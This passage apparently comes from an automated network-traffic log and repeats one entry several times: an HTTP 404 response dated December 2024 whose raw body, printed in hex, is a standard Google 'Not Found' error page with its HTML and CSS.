74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 